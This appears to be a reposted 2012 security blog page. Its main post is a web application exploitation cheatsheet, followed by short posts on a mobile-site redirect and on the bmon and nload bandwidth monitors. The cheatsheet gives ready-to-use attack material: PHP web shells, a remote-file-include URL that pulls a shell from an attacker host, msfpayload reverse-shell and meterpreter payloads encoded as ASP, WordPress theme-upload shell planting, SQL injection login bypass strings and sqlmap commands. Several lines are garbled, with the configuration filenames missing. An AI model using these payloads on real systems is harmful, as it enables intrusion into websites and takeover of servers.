Apr 19, 2012

Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.

WebShell Backdoors
Minimal php command shells

file cmd.php: PHP script text =>

<?php system($_GET['cmd']) ?>


<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI):

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp


attacker msfconsole:

use multi/exploit/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <attacker-ip>

set LPORT <attacker-multi-handler-port>


Specific Web applications


Joomla default database configuration filename


Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


 default database configuration filename

WordPress default login page

WordPress plugins

Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]

 -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via web interface as an installed theme

Command execution access is via: 


Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)


Cacti default database configuration filename


DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename



 default database configuration filename

Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer  -url <target-and-drupal-path> -type drupal

Timeclock default database configuration filename
SQL Terminators/Comments

<sql injected command>;--


<sql injected command>;#

Login Pages Basic SQL injection 


' OR '1=1';--


'OR 1=1--

SQLMap commands

cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba

Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

Apr 18, 2012

My website in mobile version by Dudamobile

I try to create my website for easily view in your mobile by use the Dudamobile service. So you can view my site in mobile version with below URL.

When you visit my site with your mobile, I add the script that will redirect you to mobile version.

URL: http://mobile.dudamobile.com/site/r00tsec_blogspot
Shorten URL: http://bit.ly/J9KOtu

If you like my blog, Please Donate Me

Apr 17, 2012

Monitor your bandwidth from the Linux shell

If you want to see full article, please go to the source


bmon is a bandwidth monitor, intended for debugging and real-time monitoring purposes, capable of retrieving statistics from various input modules. It provides various output methods including a curses based interface. A set of architecture specific input modules provide the core with the list of interfaces and their counters.
The core stores this counters and provides rate estimation including a history over the last 60 seconds, minutes, hours and days to the output modules which output them according to the configuration, when running, you can select the interface to monitor and press “g” to see an active graph like this one:


This is an interesting project that permits to display and measure the rate of data across a network connection or data being stored in a file,
As you can see, although it’s a command-line based tool, yet it has pretty vivid colors and other stuff that makes it a pretty user-friendly tool, it has the ability to monitor the current download/upload speeds of the network connections and it can be used also to measure the speed of the write to a filesystem.
Some of his features are:
  • Change update intervals (default is “1″ second).
  • Supports few built-in color depths (1,16-default, 88 and 256), higher numbers mean better quality outputs.
  • Monitors network interfaces (upload & download) and your file system.
  • Can be setup to use plain text rather than graphs.


nload is a console application which monitors network traffic and bandwidth usage in real-time. It visualizes the in and outgoing traffic using two graphs and provides more info like total amount of transferred data and min/max network usage. This program uses the Ncurses libraries and so you’ll be able to interact with the mouse in the terminal.
Features of nload
  • Supports all Ethernet interfaces.
  • View the bandwidth with a real-time graph in the shell.
  • Ability to organize the scale, the time to update the graph and the unit of measure.
 Source: http://linuxaria.com/article/monitor-your-bandwidth-from-the-linux-shell

If you like my blog, Please Donate Me